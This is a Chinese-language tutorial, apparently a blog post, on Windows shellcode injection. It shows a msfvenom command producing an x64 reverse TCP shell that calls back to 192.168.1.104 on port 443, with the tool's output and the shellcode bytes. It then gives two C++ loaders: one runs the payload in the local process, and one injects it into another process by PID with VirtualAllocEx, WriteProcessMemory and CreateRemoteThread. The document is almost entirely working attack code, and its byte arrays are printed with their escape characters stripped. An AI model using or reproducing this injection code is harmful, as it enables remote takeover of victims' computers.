这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法
首先生成我们的shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b x00x0ax0d
root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b x00x0ax0d [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload Found 3 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=50, char=0x61) Attempting to encode payload with 1 iterations of x64/xor x64/xor succeeded with size 503 (iteration=0) x64/xor chosen with final size 503 Payload size: 503 bytes Final size of c file: 2138 bytes unsigned char buf[] = "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff" "xffxffx48xbbxecx91x66x93xd5xdbx11xd7x48x31x58" "x27x48x2dxf8xffxffxffxe2xf4x10xd9xe5x77x25x33" "xd1xd7xecx91x27xc2x94x8bx43x86xbaxd9x57x41xb0" "x93x9ax85x8cxd9xedxc1xcdx93x9ax85xccxd9xedxe1" "x85x93x1ex60xa6xdbx2bxa2x1cx93x20x17x40xadx07" "xefxd7xf7x31x96x2dx58x6bxd2xd4x1axf3x3axbexd0" "x37xdbx5ex89x31x5cxaexadx2ex92x05x50x91x5fxec" "x91x66xdbx50x1bx65xb0xa4x90xb6xc3x5ex93x09x93" "x67xd1x46xdaxd4x0bxf2x81xa4x6exafxd2x5exefx99" "x9fxedx47x2bxa2x1cx93x20x17x40xd0xa7x5axd8x9a" "x10x16xd4x71x13x62x99xd8x5dxf3xe4xd4x5fx42xa0" "x03x49x93x67xd1x42xdaxd4x0bx77x96x67x9dx2exd7" "x5ex9bx0dx9exedx41x27x18xd1x53x59xd6x3cxd0x3e" "xd2x8dx85x48x8dxadxc9x27xcax94x81x59x54x00xb1" "x27xc1x2ax3bx49x96xb5xcbx2ex18xc7x32x46x28x13" "x6ex3bxdax6bxacx62xe5xb3xa2x54x93xd5x9ax47x9e" "x65x77x2ex12x39x7bx10xd7xecxd8xefx76x9cx67x13" "xd7xedx2axa6x3bxd4xb3x50x83xa5x18x82xdfx5cx2a" "x50x6dxa0xe6x40x94x2ax0ex5dx5ex06xf9x67x92xd5" "xdbx48x96x56xb8xe6xf8xd5x24xc4x87xbcxdcx57x5a" "x98xeaxd1x9fx13x51x2ex1ax17x93xeex17xa4x18xa7" "xd2x6fx31x1ex08x0cx6exb3xdbx5cx1cx7bxc7xadxc9" "x2ax1ax37x93x98x2exadx2bxffx36xa1xbaxeex02xa4" "x10xa2xd3xd7xdbx11x9ex54xf2x0bxf7xd5xdbx11xd7" "xecxd0x36xd2x85x93x98x35xbbxc6x31xdexe4x1bx7b" "xdaxb5xd0x36x71x29xbdxd6x93xc8xc5x67x92x9dx56" "x55xf3xf4x57x66xfbx9dx52xf7x81xbcxd0x36xd2x85" "x9ax41x9ex13x51x27xc3x9cx24xd9x9ax65x50x2ax1a" "x14x9axabxaex20xaexe0x6cx00x93x20x05xa4x6exac" "x18xdbx9axabxdfx6bx8cx06x6cx00x60xe1x62x4exc7" "x27x29x73x4exacx4ax13x44x2ex10x11xf3x2dxd1x90" "x9bxe6x68x35xaex14x6cxabx82x14xfcxbfxdbx48x96" "x65x4bx99x46xd5xdbx11xd7";
这里我们用c++注入本地进程
// ConsoleApplication3.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "stdafx.h"
#include "Windows.h"
int main()
{
unsigned char buf[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxecx91x66x93xd5xdbx11xd7x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x10xd9xe5x77x25x33"
"xd1xd7xecx91x27xc2x94x8bx43x86xbaxd9x57x41xb0"
"x93x9ax85x8cxd9xedxc1xcdx93x9ax85xccxd9xedxe1"
"x85x93x1ex60xa6xdbx2bxa2x1cx93x20x17x40xadx07"
"xefxd7xf7x31x96x2dx58x6bxd2xd4x1axf3x3axbexd0"
"x37xdbx5ex89x31x5cxaexadx2ex92x05x50x91x5fxec"
"x91x66xdbx50x1bx65xb0xa4x90xb6xc3x5ex93x09x93"
"x67xd1x46xdaxd4x0bxf2x81xa4x6exafxd2x5exefx99"
"x9fxedx47x2bxa2x1cx93x20x17x40xd0xa7x5axd8x9a"
"x10x16xd4x71x13x62x99xd8x5dxf3xe4xd4x5fx42xa0"
"x03x49x93x67xd1x42xdaxd4x0bx77x96x67x9dx2exd7"
"x5ex9bx0dx9exedx41x27x18xd1x53x59xd6x3cxd0x3e"
"xd2x8dx85x48x8dxadxc9x27xcax94x81x59x54x00xb1"
"x27xc1x2ax3bx49x96xb5xcbx2ex18xc7x32x46x28x13"
"x6ex3bxdax6bxacx62xe5xb3xa2x54x93xd5x9ax47x9e"
"x65x77x2ex12x39x7bx10xd7xecxd8xefx76x9cx67x13"
"xd7xedx2axa6x3bxd4xb3x50x83xa5x18x82xdfx5cx2a"
"x50x6dxa0xe6x40x94x2ax0ex5dx5ex06xf9x67x92xd5"
"xdbx48x96x56xb8xe6xf8xd5x24xc4x87xbcxdcx57x5a"
"x98xeaxd1x9fx13x51x2ex1ax17x93xeex17xa4x18xa7"
"xd2x6fx31x1ex08x0cx6exb3xdbx5cx1cx7bxc7xadxc9"
"x2ax1ax37x93x98x2exadx2bxffx36xa1xbaxeex02xa4"
"x10xa2xd3xd7xdbx11x9ex54xf2x0bxf7xd5xdbx11xd7"
"xecxd0x36xd2x85x93x98x35xbbxc6x31xdexe4x1bx7b"
"xdaxb5xd0x36x71x29xbdxd6x93xc8xc5x67x92x9dx56"
"x55xf3xf4x57x66xfbx9dx52xf7x81xbcxd0x36xd2x85"
"x9ax41x9ex13x51x27xc3x9cx24xd9x9ax65x50x2ax1a"
"x14x9axabxaex20xaexe0x6cx00x93x20x05xa4x6exac"
"x18xdbx9axabxdfx6bx8cx06x6cx00x60xe1x62x4exc7"
"x27x29x73x4exacx4ax13x44x2ex10x11xf3x2dxd1x90"
"x9bxe6x68x35xaex14x6cxabx82x14xfcxbfxdbx48x96"
"x65x4bx99x46xd5xdbx11xd7";
void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buf, sizeof buf);
((void(*)())exec)();
return 0;
}
我们来反汇编一下看看这个shellcode是如何在x64机器上面运行的
下面我们将shellcode注入到指定pid进程
我们构造注入进程c++代码
// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include "Windows.h" int main(int argc, char *argv[]) { unsigned char buf[] = "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff" "xffxffx48xbbxecx91x66x93xd5xdbx11xd7x48x31x58" "x27x48x2dxf8xffxffxffxe2xf4x10xd9xe5x77x25x33" "xd1xd7xecx91x27xc2x94x8bx43x86xbaxd9x57x41xb0" "x93x9ax85x8cxd9xedxc1xcdx93x9ax85xccxd9xedxe1" "x85x93x1ex60xa6xdbx2bxa2x1cx93x20x17x40xadx07" "xefxd7xf7x31x96x2dx58x6bxd2xd4x1axf3x3axbexd0" "x37xdbx5ex89x31x5cxaexadx2ex92x05x50x91x5fxec" "x91x66xdbx50x1bx65xb0xa4x90xb6xc3x5ex93x09x93" "x67xd1x46xdaxd4x0bxf2x81xa4x6exafxd2x5exefx99" "x9fxedx47x2bxa2x1cx93x20x17x40xd0xa7x5axd8x9a" "x10x16xd4x71x13x62x99xd8x5dxf3xe4xd4x5fx42xa0" "x03x49x93x67xd1x42xdaxd4x0bx77x96x67x9dx2exd7" "x5ex9bx0dx9exedx41x27x18xd1x53x59xd6x3cxd0x3e" "xd2x8dx85x48x8dxadxc9x27xcax94x81x59x54x00xb1" "x27xc1x2ax3bx49x96xb5xcbx2ex18xc7x32x46x28x13" "x6ex3bxdax6bxacx62xe5xb3xa2x54x93xd5x9ax47x9e" "x65x77x2ex12x39x7bx10xd7xecxd8xefx76x9cx67x13" "xd7xedx2axa6x3bxd4xb3x50x83xa5x18x82xdfx5cx2a" "x50x6dxa0xe6x40x94x2ax0ex5dx5ex06xf9x67x92xd5" "xdbx48x96x56xb8xe6xf8xd5x24xc4x87xbcxdcx57x5a" "x98xeaxd1x9fx13x51x2ex1ax17x93xeex17xa4x18xa7" "xd2x6fx31x1ex08x0cx6exb3xdbx5cx1cx7bxc7xadxc9" "x2ax1ax37x93x98x2exadx2bxffx36xa1xbaxeex02xa4" "x10xa2xd3xd7xdbx11x9ex54xf2x0bxf7xd5xdbx11xd7" "xecxd0x36xd2x85x93x98x35xbbxc6x31xdexe4x1bx7b" "xdaxb5xd0x36x71x29xbdxd6x93xc8xc5x67x92x9dx56" "x55xf3xf4x57x66xfbx9dx52xf7x81xbcxd0x36xd2x85" "x9ax41x9ex13x51x27xc3x9cx24xd9x9ax65x50x2ax1a" "x14x9axabxaex20xaexe0x6cx00x93x20x05xa4x6exac" "x18xdbx9axabxdfx6bx8cx06x6cx00x60xe1x62x4exc7" "x27x29x73x4exacx4ax13x44x2ex10x11xf3x2dxd1x90" "x9bxe6x68x35xaex14x6cxabx82x14xfcxbfxdbx48x96" "x65x4bx99x46xd5xdbx11xd7"; HANDLE processHandle; HANDLE remoteThread; PVOID remoteBuffer; printf("Injecting to PID: %i", atoi(argv[1])); processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL); remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(processHandle); return 0; }
